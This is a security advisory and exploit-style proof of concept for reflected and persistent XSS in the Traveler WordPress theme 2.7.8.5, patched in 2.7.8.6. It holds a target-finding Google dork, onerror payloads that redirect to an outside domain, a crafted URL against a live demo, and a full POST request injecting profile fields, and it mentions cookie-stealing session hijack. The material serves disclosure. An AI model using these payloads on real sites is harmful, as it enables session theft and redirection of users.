Travel Booking < 2.7.8.6 – Reflected & Persistent XSS Issues

Description

Reflected & Persistent XSS vulnerability was discovered in the 'Travel Booking WordPress Theme', tested version — v2.7.8.5

Edit (WPScanTeam):
January 11th, 2020 - Report received & Envato contacted
January 12th, 2020 - Report updated with Reflected XSS, Envato notified again.
January 12th, 2020 - Envato investigating
January 13th, 2020 - 2.7.8.6 released, fixing the issues

Proof of Concept

# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Reflected & Persistent XSS
# Google Dork: /wp-content/themes/traveler/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://travelerwp.com/
# Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Version: 2.7.8.5
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: https://mixmap.travelerwp.com/
PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC: https://mixmap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E


----[]- Persistent XSS -> User Profile: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Paypal Email», «Phone Number» and «Home Airport». Vulnerable textarea: «About Yourself».

Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /page-user-setting/?sc=setting&id_user HTTP/1.1
Host: mixmap.travelerwp.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 2210
Origin: https://mixmap.travelerwp.com
Connection: close
Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="st_update_user"

ba1d73a992
-----------------------------191691572411478
Content-Disposition: form-data; name="_wp_http_referer"

/page-user-setting/?sc=setting&id_user
-----------------------------191691572411478
Content-Disposition: form-data; name="id_user"

1672
-----------------------------191691572411478
Content-Disposition: form-data; name="st_paypal_email"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_email"

asdasd@asdasd.com
-----------------------------191691572411478
Content-Disposition: form-data; name="st_phone"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_bio"

</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_is_check_show_info"

on
-----------------------------191691572411478
Content-Disposition: form-data; name="id_avatar"

10928
-----------------------------191691572411478
Content-Disposition: form-data; name="st_avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------191691572411478
Content-Disposition: form-data; name="st_airport"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_province"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_address"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_zip_code"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_city"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_country"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_btn_update"

Save Changes
-----------------------------191691572411478--